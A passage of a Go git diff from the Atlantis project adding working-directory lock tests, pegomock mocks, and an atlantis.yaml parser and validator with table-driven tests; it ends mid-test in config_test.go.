+ _, err = locker.TryLock(repo, workspace, newPull)
+ Ok(t, err)
+
+ t.Log("and both should now be locked")
+ _, err = locker.TryLock(repo, workspace, 1)
+ ErrContains(t, "currently locked", err)
+ _, err = locker.TryLock(repo, workspace, newPull)
+ ErrContains(t, "currently locked", err)
+}
+
+func TestUnlock(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ t.Log("unlocking should work")
+ unlockFn, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ unlockFn()
+ _, err = locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+}
+
+func TestUnlockDifferentWorkspaces(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+ t.Log("unlocking should work for different workspaces")
+ unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+ Ok(t, err1)
+ unlockFn2, err2 := locker.TryLock(repo, "new-workspace", 1)
+ Ok(t, err2)
+ unlockFn1()
+ unlockFn2()
+
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ _, err = locker.TryLock(repo, "new-workspace", 1)
+ Ok(t, err)
+}
+
+func TestUnlockDifferentRepos(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+ t.Log("unlocking should work for different repos")
+ unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+ Ok(t, err1)
+ newRepo := "owner/newrepo"
+ unlockFn2, err2 := locker.TryLock(newRepo, workspace, 1)
+ Ok(t, err2)
+ unlockFn1()
+ unlockFn2()
+
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ _, err = locker.TryLock(newRepo, workspace, 1)
+ Ok(t, err)
+}
+
+func TestUnlockDifferentPulls(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+ t.Log("unlocking should work for different pulls")
+ unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+ Ok(t, err1)
+ newPull := 2
+ unlockFn2, err2 := locker.TryLock(repo, workspace, newPull)
+ Ok(t, err2)
+ unlockFn1()
+ unlockFn2()
+
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ _, err = locker.TryLock(repo, workspace, newPull)
+ Ok(t, err)
+}
diff --git a/server/events/yaml/mocks/matchers/valid_spec.go b/server/events/yaml/mocks/matchers/valid_spec.go
new file mode 100644
index 0000000000..9c60066733
--- /dev/null
+++ b/server/events/yaml/mocks/matchers/valid_spec.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ valid "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+func AnyValidConfig() valid.Config {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(valid.Config))(nil)).Elem()))
+ var nullValue valid.Config
+ return nullValue
+}
+
+func EqValidConfig(value valid.Config) valid.Config {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue valid.Config
+ return nullValue
+}
diff --git a/server/events/yaml/mocks/mock_parser_validator.go b/server/events/yaml/mocks/mock_parser_validator.go
new file mode 100644
index 0000000000..24655f8715
--- /dev/null
+++ b/server/events/yaml/mocks/mock_parser_validator.go
@@ -0,0 +1,80 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events/yaml (interfaces: ParserValidator)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ valid "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+type MockParserValidator struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockParserValidator() *MockParserValidator {
+ return &MockParserValidator{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockParserValidator) ReadConfig(repoDir string) (valid.Config, error) {
+ params := []pegomock.Param{repoDir}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ReadConfig", params, []reflect.Type{reflect.TypeOf((*valid.Config)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 valid.Config
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(valid.Config)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockParserValidator) VerifyWasCalledOnce() *VerifierParserValidator {
+ return &VerifierParserValidator{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierParserValidator {
+ return &VerifierParserValidator{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierParserValidator {
+ return &VerifierParserValidator{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierParserValidator struct {
+ mock *MockParserValidator
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierParserValidator) ReadConfig(repoDir string) *ParserValidator_ReadConfig_OngoingVerification {
+ params := []pegomock.Param{repoDir}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ReadConfig", params)
+ return &ParserValidator_ReadConfig_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ParserValidator_ReadConfig_OngoingVerification struct {
+ mock *MockParserValidator
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ParserValidator_ReadConfig_OngoingVerification) GetCapturedArguments() string {
+ repoDir := c.GetAllCapturedArguments()
+ return repoDir[len(repoDir)-1]
+}
+
+func (c *ParserValidator_ReadConfig_OngoingVerification) GetAllCapturedArguments() (_param0 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]string, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(string)
+ }
+ }
+ return
+}
diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go
new file mode 100644
index 0000000000..c8ad9ca096
--- /dev/null
+++ b/server/events/yaml/parser_validator.go
@@ -0,0 +1,146 @@
+package yaml
+
+import (
+ "fmt"
+ "io/ioutil"
+ "os"
+ "path/filepath"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "gopkg.in/yaml.v2"
+)
+
+// AtlantisYAMLFilename is the name of the config file for each repo.
+const AtlantisYAMLFilename = "atlantis.yaml"
+
+type ParserValidator struct{}
+
+// ReadConfig returns the parsed and validated atlantis.yaml config for repoDir.
+// If there was no config file, then this can be detected by checking the type
+// of error: os.IsNotExist(error) but it's instead preferred to check with
+// HasConfigFile.
+func (p *ParserValidator) ReadConfig(repoDir string) (valid.Config, error) {
+ configFile := p.configFilePath(repoDir)
+ configData, err := ioutil.ReadFile(configFile)
+
+ // NOTE: the error we return here must also be os.IsNotExist since that's
+ // what our callers use to detect a missing config file.
+ if err != nil && os.IsNotExist(err) {
+ return valid.Config{}, err
+ }
+
+ // If it exists but we couldn't read it return an error.
+ if err != nil {
+ return valid.Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
+ }
+
+ // If the config file exists, parse it.
+ config, err := p.parseAndValidate(configData)
+ if err != nil {
+ return valid.Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
+ }
+ return config, err
+}
+
+func (p *ParserValidator) HasConfigFile(repoDir string) (bool, error) {
+ _, err := os.Stat(p.configFilePath(repoDir))
+ if os.IsNotExist(err) {
+ return false, nil
+ }
+ if err == nil {
+ return true, nil
+ }
+ return false, err
+}
+
+func (p *ParserValidator) configFilePath(repoDir string) string {
+ return filepath.Join(repoDir, AtlantisYAMLFilename)
+}
+
+func (p *ParserValidator) parseAndValidate(configData []byte) (valid.Config, error) {
+ var rawConfig raw.Config
+ if err := yaml.UnmarshalStrict(configData, &rawConfig); err != nil {
+ return valid.Config{}, err
+ }
+
+ // Set ErrorTag to yaml so it uses the YAML field names in error messages.
+ validation.ErrorTag = "yaml"
+
+ if err := rawConfig.Validate(); err != nil {
+ return valid.Config{}, err
+ }
+
+ // Top level validation.
+ if err := p.validateWorkflows(rawConfig); err != nil {
+ return valid.Config{}, err
+ }
+
+ validConfig := rawConfig.ToValid()
+ if err := p.validateProjectNames(validConfig); err != nil {
+ return valid.Config{}, err
+ }
+
+ return validConfig, nil
+}
+
+func (p *ParserValidator) validateProjectNames(config valid.Config) error {
+ // First, validate that all names are unique.
+ seen := make(map[string]bool)
+ for _, project := range config.Projects {
+ if project.Name != nil {
+ name := *project.Name
+ exists := seen[name]
+ if exists {
+ return fmt.Errorf("found two or more projects with name %q; project names must be unique", name)
+ }
+ seen[name] = true
+ }
+ }
+
+ // Next, validate that all dir/workspace combos are named.
+ // This map's keys will be 'dir/workspace' and the values are the names for
+ // that project.
+ dirWorkspaceToNames := make(map[string][]string)
+ for _, project := range config.Projects {
+ key := fmt.Sprintf("%s/%s", project.Dir, project.Workspace)
+ names := dirWorkspaceToNames[key]
+
+ // If there is already a project with this dir/workspace then this
+ // project must have a name.
+ if len(names) > 0 && project.Name == nil {
+ return fmt.Errorf("there are two or more projects with dir: %q workspace: %q that are not all named; they must have a 'name' key so they can be targeted for apply's separately", project.Dir, project.Workspace)
+ }
+ var name string
+ if project.Name != nil {
+ name = *project.Name
+ }
+ dirWorkspaceToNames[key] = append(dirWorkspaceToNames[key], name)
+ }
+
+ return nil
+}
+
+func (p *ParserValidator) validateWorkflows(config raw.Config) error {
+ for _, project := range config.Projects {
+ if err := p.validateWorkflowExists(project, config.Workflows); err != nil {
+ return err
+ }
+ }
+ return nil
+}
+
+func (p *ParserValidator) validateWorkflowExists(project raw.Project, workflows map[string]raw.Workflow) error {
+ if project.Workflow == nil {
+ return nil
+ }
+ workflow := *project.Workflow
+ for k := range workflows {
+ if k == workflow {
+ return nil
+ }
+ }
+ return fmt.Errorf("workflow %q is not defined", workflow)
+}
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
new file mode 100644
index 0000000000..43b5270631
--- /dev/null
+++ b/server/events/yaml/parser_validator_test.go
@@ -0,0 +1,629 @@
+package yaml_test
+
+import (
+ "io/ioutil"
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/yaml"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestReadConfig_DirDoesNotExist(t *testing.T) {
+ r := yaml.ParserValidator{}
+ _, err := r.ReadConfig("/not/exist")
+ Assert(t, os.IsNotExist(err), "exp nil ptr")
+
+ exists, err := r.HasConfigFile("/not/exist")
+ Ok(t, err)
+ Equals(t, false, exists)
+}
+
+func TestReadConfig_FileDoesNotExist(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ r := yaml.ParserValidator{}
+ _, err := r.ReadConfig(tmpDir)
+ Assert(t, os.IsNotExist(err), "exp nil ptr")
+
+ exists, err := r.HasConfigFile(tmpDir)
+ Ok(t, err)
+ Equals(t, false, exists)
+}
+
+func TestReadConfig_BadPermissions(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
+ Ok(t, err)
+
+ r := yaml.ParserValidator{}
+ _, err = r.ReadConfig(tmpDir)
+ ErrContains(t, "unable to read atlantis.yaml file: ", err)
+}
+
+func TestReadConfig_UnmarshalErrors(t *testing.T) {
+ // We only have a few cases here because we assume the YAML library to be
+ // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810.
+ cases := []struct {
+ description string
+ input string
+ expErr string
+ }{
+ {
+ "random characters",
+ "slkjds",
+ "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into raw.Config",
+ },
+ {
+ "just a colon",
+ ":",
+ "parsing atlantis.yaml: yaml: did not find expected key",
+ },
+ }
+
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+ Ok(t, err)
+ r := yaml.ParserValidator{}
+ _, err = r.ReadConfig(tmpDir)
+ ErrEquals(t, c.expErr, err)
+ })
+ }
+}
+
+func TestReadConfig(t *testing.T) {
+ tfVersion, _ := version.NewVersion("v0.11.0")
+ cases := []struct {
+ description string
+ input string
+ expErr string
+ exp valid.Config
+ }{
+ // Version key.
+ {
+ description: "no version",
+ input: `
+projects:
+- dir: "."
+`,
+ expErr: "version: is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html.",
+ },
+ {
+ description: "unsupported version",
+ input: `
+version: 0
+projects:
+- dir: "."
+`,
+ expErr: "version: must equal 2.",
+ },
+ {
+ description: "empty version",
+ input: `
+version: ~
+projects:
+- dir: "."
+`,
+ expErr: "version: must equal 2.",
+ },
+
+ // Projects key.
+ {
+ description: "empty projects list",
+ input: `
+version: 2
+projects:`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: nil,
+ Workflows: map[string]valid.Workflow{},
+ },
+ },
+ {
+ description: "project dir not set",
+ input: `
+version: 2
+projects:
+- `,
+ expErr: "projects: (0: (dir: cannot be blank.).).",
+ },
+ {
+ description: "project dir set",
+ input: `
+version: 2
+projects:
+- dir: .`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Workspace: "default",
+ Workflow: nil,
+ TerraformVersion: nil,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: nil,
+ },
+ },
+ Workflows: map[string]valid.Workflow{},
+ },
+ },
+ {
+ description: "project fields set except autoplan",
+ input: `
+version: 2
+projects:
+- dir: .
+ workspace: myworkspace
+ terraform_version: v0.11.0
+ apply_requirements: [approved]
+ workflow: myworkflow
+workflows:
+ myworkflow: ~`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Workspace: "myworkspace",
+ Workflow: String("myworkflow"),
+ TerraformVersion: tfVersion,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: []string{"approved"},
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {},
+ },
+ },
+ },
+ {
+ description: "project field with autoplan",
+ input: `
+version: 2
+projects:
+- dir: .
+ workspace: myworkspace
+ terraform_version: v0.11.0
+ apply_requirements: [approved]
+ workflow: myworkflow
+ autoplan:
+ enabled: false
+workflows:
+ myworkflow: ~`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Workspace: "myworkspace",
+ Workflow: String("myworkflow"),
+ TerraformVersion: tfVersion,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: false,
+ },
+ ApplyRequirements: []string{"approved"},
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {},
+ },
+ },
+ },
+ {
+ description: "project dir with ..",
+ input: `
+version: 2
+projects:
+- dir: ..`,
+ expErr: "projects: (0: (dir: cannot contain '..'.).).",
+ },
+
+ // Project must have dir set.
+ {
+ description: "project with no config",
+ input: `
+version: 2
+projects:
+-`,
+ expErr: "projects: (0: (dir: cannot be blank.).).",
+ },
+ {
+ description: "project with no config at index 1",
+ input: `
+version: 2
+projects:
+- dir: "."
+-`,
+ expErr: "projects: (1: (dir: cannot be blank.).).",
+ },
+ {
+ description: "project with unknown key",
+ input: `
+version: 2
+projects:
+- unknown: value`,
+ expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct raw.Project",
+ },
+ {
+ description: "referencing workflow that doesn't exist",
+ input: `
+version: 2
+projects:
+- dir: .
+ workflow: undefined`,
+ expErr: "workflow \"undefined\" is not defined",
+ },
+ {
+ description: "two projects with same dir/workspace without names",
+ input: `
+version: 2
+projects:
+- dir: .
+ workspace: workspace
+- dir: .
+ workspace: workspace`,
+ expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately",
+ },
+ {
+ description: "two projects with same dir/workspace only one with name",
+ input: `
+version: 2
+projects:
+- name: myname
+ dir: .
+ workspace: workspace
+- dir: .
+ workspace: workspace`,
+ expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately",
+ },
+ {
+ description: "two projects with same dir/workspace both with same name",
+ input: `
+version: 2
+projects:
+- name: myname
+ dir: .
+ workspace: workspace
+- name: myname
+ dir: .
+ workspace: workspace`,
+ expErr: "found two or more projects with name \"myname\"; project names must be unique",
+ },
+ {
+ description: "two projects with same dir/workspace with different names",
+ input: `
+version: 2
+projects:
+- name: myname
+ dir: .
+ workspace: workspace
+- name: myname2
+ dir: .
+ workspace: workspace`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Name: String("myname"),
+ Dir: ".",
+ Workspace: "workspace",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ },
+ {
+ Name: String("myname2"),
+ Dir: ".",
+ Workspace: "workspace",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ },
+ },
+ Workflows: map[string]valid.Workflow{},
+ },
+ },
+ }
+
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+ Ok(t, err)
+
+ r := yaml.ParserValidator{}
+ act, err := r.ReadConfig(tmpDir)
+ if c.expErr != "" {
+ ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
+ return
+ }
+ Ok(t, err)
+ Equals(t, c.exp, act)
+ })
+ }
+}
+
+func TestReadConfig_Successes(t *testing.T) {
+ basicProjects := []valid.Project{
+ {
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ Workspace: "default",
+ ApplyRequirements: nil,
+ Dir: ".",
+ },
+ }
+
+ cases := []struct {
+ description string
+ input string
+ expOutput valid.Config
+ }{
+ {
+ description: "uses project defaults",
+ input: `
+version: 2
+projects:
+- dir: "."`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "autoplan is enabled by default",
+ input: `
+version: 2
+projects:
+- dir: "."
+ autoplan:
+ when_modified: ["**/*.tf"]
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "if workflows not defined there are none",
+ input: `
+version: 2
+projects:
+- dir: "."
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "if workflows key set but with no workflows there are none",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows: ~
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+ default:
+ plan:
+ steps:
+ apply:
+ steps:
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: map[string]valid.Workflow{
+ "default": {
+ Plan: &valid.Stage{
+ Steps: nil,
+ },
+ Apply: &valid.Stage{
+ Steps: nil,
+ },
+ },
+ },
+ },
+ },
+ {
+ description: "if steps are set then we parse them properly",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+ default:
+ plan:
+ steps:
+ - init
+ - plan
+ apply:
+ steps:
+ - plan # we don't validate if they make sense
+ - apply
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: map[string]valid.Workflow{
+ "default": {
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ {
+ StepName: "plan",
+ },
+ },
+ },
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "plan",
+ },
+ {
+ StepName: "apply",
+ },
+ },
+ },
+ },
+ },
+ },
+ },
+ {
+ description: "we parse extra_args for the steps",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+ default:
+ plan:
+ steps:
+ - init:
+ extra_args: []
+ - plan:
+ extra_args:
+ - arg1
+ - arg2
+ apply:
+ steps:
+ - plan:
+ extra_args: [a, b]
+ - apply:
+ extra_args: ["a", "b"]
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: map[string]valid.Workflow{
+ "default": {
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ ExtraArgs: []string{},
+ },
+ {
+ StepName: "plan",
+ ExtraArgs: []string{"arg1", "arg2"},
+ },
+ },
+ },
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "plan",
+ ExtraArgs: []string{"a", "b"},
+ },
+ {
+ StepName: "apply",
+ ExtraArgs: []string{"a", "b"},
+ },
+ },
+ },
+ },
+ },
+ },
+ },
+ {
+ description: "custom steps are parsed",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+ default:
+ plan:
+ steps:
+ - run: "echo \"plan hi\""
+ apply:
+ steps:
+ - run: echo apply "arg 2"
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: map[string]valid.Workflow{
+ "default": {
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "run",
+ RunCommand: []string{"echo", "plan hi"},
+ },
+ },
+ },
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "run",
+ RunCommand: []string{"echo", "apply", "arg 2"},
+ },
+ },
+ },
+ },
+ },
+ },
+ },
+ }
+
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+ Ok(t, err)
+
+ r := yaml.ParserValidator{}
+ act, err := r.ReadConfig(tmpDir)
+ Ok(t, err)
+ Equals(t, c.expOutput, act)
+ })
+ }
+}
+
+// String is a helper routine that allocates a new string value
+// to store v and returns a pointer to it.
+func String(v string) *string { return &v }
diff --git a/server/events/yaml/raw/autoplan.go b/server/events/yaml/raw/autoplan.go
new file mode 100644
index 0000000000..00222d1631
--- /dev/null
+++ b/server/events/yaml/raw/autoplan.go
@@ -0,0 +1,39 @@
+package raw
+
+import "github.com/runatlantis/atlantis/server/events/yaml/valid"
+
+const DefaultAutoPlanWhenModified = "**/*.tf"
+const DefaultAutoPlanEnabled = true
+
+type Autoplan struct {
+ WhenModified []string `yaml:"when_modified,omitempty"`
+ Enabled *bool `yaml:"enabled,omitempty"`
+}
+
+func (a Autoplan) ToValid() valid.Autoplan {
+ var v valid.Autoplan
+ if a.WhenModified == nil {
+ v.WhenModified = []string{DefaultAutoPlanWhenModified}
+ } else {
+ v.WhenModified = a.WhenModified
+ }
+
+ if a.Enabled == nil {
+ v.Enabled = true
+ } else {
+ v.Enabled = *a.Enabled
+ }
+
+ return v
+}
+
+func (a Autoplan) Validate() error {
+ return nil
+}
+
+func DefaultAutoPlan() valid.Autoplan {
+ return valid.Autoplan{
+ WhenModified: []string{DefaultAutoPlanWhenModified},
+ Enabled: DefaultAutoPlanEnabled,
+ }
+}
diff --git a/server/events/yaml/raw/autoplan_test.go b/server/events/yaml/raw/autoplan_test.go
new file mode 100644
index 0000000000..43b85a0143
--- /dev/null
+++ b/server/events/yaml/raw/autoplan_test.go
@@ -0,0 +1,151 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestAutoPlan_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Autoplan
+ }{
+ {
+ description: "omit unset fields",
+ input: "",
+ exp: raw.Autoplan{
+ Enabled: nil,
+ WhenModified: nil,
+ },
+ },
+ {
+ description: "all fields set",
+ input: `
+enabled: true
+when_modified: ["something-else"]
+`,
+ exp: raw.Autoplan{
+ Enabled: Bool(true),
+ WhenModified: []string{"something-else"},
+ },
+ },
+ {
+ description: "enabled false",
+ input: `
+enabled: false
+when_modified: ["something-else"]
+`,
+ exp: raw.Autoplan{
+ Enabled: Bool(false),
+ WhenModified: []string{"something-else"},
+ },
+ },
+ {
+ description: "modified elem empty",
+ input: `
+enabled: false
+when_modified:
+-
+`,
+ exp: raw.Autoplan{
+ Enabled: Bool(false),
+ WhenModified: []string{""},
+ },
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var a raw.Autoplan
+ err := yaml.UnmarshalStrict([]byte(c.input), &a)
+ Ok(t, err)
+ Equals(t, c.exp, a)
+ })
+ }
+}
+
+func TestAutoplan_Validate(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Autoplan
+ }{
+ {
+ description: "nothing set",
+ input: raw.Autoplan{},
+ },
+ {
+ description: "when_modified empty",
+ input: raw.Autoplan{
+ WhenModified: []string{},
+ },
+ },
+ {
+ description: "enabled false",
+ input: raw.Autoplan{
+ Enabled: Bool(false),
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Ok(t, c.input.Validate())
+ })
+ }
+}
+
+func TestAutoplan_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Autoplan
+ exp valid.Autoplan
+ }{
+ {
+ description: "nothing set",
+ input: raw.Autoplan{},
+ exp: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ {
+ description: "when modified empty",
+ input: raw.Autoplan{
+ WhenModified: []string{},
+ },
+ exp: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{},
+ },
+ },
+ {
+ description: "enabled false",
+ input: raw.Autoplan{
+ Enabled: Bool(false),
+ },
+ exp: valid.Autoplan{
+ Enabled: false,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ {
+ description: "enabled true",
+ input: raw.Autoplan{
+ Enabled: Bool(true),
+ },
+ exp: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/raw/config.go b/server/events/yaml/raw/config.go
new file mode 100644
index 0000000000..218e02e608
--- /dev/null
+++ b/server/events/yaml/raw/config.go
@@ -0,0 +1,50 @@
+package raw
+
+import (
+ "errors"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+// Config is the representation for the whole config file at the top level.
+type Config struct {
+ Version *int `yaml:"version,omitempty"`
+ Projects []Project `yaml:"projects,omitempty"`
+ Workflows map[string]Workflow `yaml:"workflows,omitempty"`
+}
+
+func (c Config) Validate() error {
+ equals2 := func(value interface{}) error {
+ asIntPtr := value.(*int)
+ if asIntPtr == nil {
+ return errors.New("is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html")
+ }
+ if *asIntPtr != 2 {
+ return errors.New("must equal 2")
+ }
+ return nil
+ }
+ return validation.ValidateStruct(&c,
+ validation.Field(&c.Version, validation.By(equals2)),
+ validation.Field(&c.Projects),
+ validation.Field(&c.Workflows),
+ )
+}
+
+func (c Config) ToValid() valid.Config {
+ var validProjects []valid.Project
+ for _, p := range c.Projects {
+ validProjects = append(validProjects, p.ToValid())
+ }
+
+ validWorkflows := make(map[string]valid.Workflow)
+ for k, v := range c.Workflows {
+ validWorkflows[k] = v.ToValid()
+ }
+ return valid.Config{
+ Version: *c.Version,
+ Projects: validProjects,
+ Workflows: validWorkflows,
+ }
+}
diff --git a/server/events/yaml/raw/config_test.go b/server/events/yaml/raw/config_test.go
new file mode 100644
index 0000000000..be5c880629
--- /dev/null
+++ b/server/events/yaml/raw/config_test.go
@@ -0,0 +1,283 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestConfig_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Config
+ expErr string
+ }{
+ {
+ description: "no data",
+ input: "",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "yaml nil",
+ input: "~",
